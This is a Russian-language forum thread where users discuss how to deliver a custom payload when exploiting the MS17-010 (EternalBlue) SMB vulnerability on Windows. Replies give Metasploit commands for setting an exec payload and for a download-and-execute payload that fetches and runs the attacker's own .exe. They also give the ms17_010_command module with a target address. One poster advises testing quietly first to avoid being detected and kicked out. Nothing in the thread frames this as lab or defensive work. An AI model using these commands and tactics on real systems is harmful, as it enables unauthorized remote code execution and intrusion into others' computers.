PrivEsc MS17-010 как задать свой пейлоад?

[sect adept]

Привет читающему! Как при атаке MS10-010 задать свой пейлоад, например батник?

 

[weaver]

Эксп из метасплойта? тогда так
set payload windows/x64/exec

 

[sect adept]

Эксп из метасплойта? тогда так
set payload windows/x64/exec

Да, с меты. Спасибо!

 

[sect adept]

А если эксп не из меты, а свой? Например bat или exe?

 

[weaver]

А если эксп не из меты, а свой? Например bat или exe?

Тогда никак. Как автор его задумал так он и будет работать. Там править шелл-код надо будет, чтобы он делал то, что ты хочешь. Это работа уже для специалиста, который разбирается в бинарной эксплуатации на уровне ядра под windows.

 

[arsarsov]

А если эксп не из меты, а свой? Например bat или exe?

в set payload выбери нагрузку Download&Execute и укажи ссылку на свой .exe файл
сплойт когда отработает подгрузит на тачку твой файл и запустит его

 

[Vasyan]

используете сначала этот модуль

use auxiliary/admin/smb/ms17_010_command
set RHOST 192.168.200.200
set command "cmd.exe /c whoami"

т.к. можете спалится, и выкинуть вас довольно быстро

 

[supra]

используете сначала этот модуль

use auxiliary/admin/smb/ms17_010_command
set RHOST 192.168.200.200
set command "cmd.exe /c whoami"

т.к. можете спалится, и выкинуть вас довольно быстро

Если доменного юзера нет то возьникнут сложности с поиском пайпа на ос вин7/2008

 

[Vasyan]

Если доменного юзера нет то возьникнут сложности с поиском пайпа на ос вин7/2008

согласен, но если так работает, то лучше попробовать сначала, чем грузить файл в неизвестность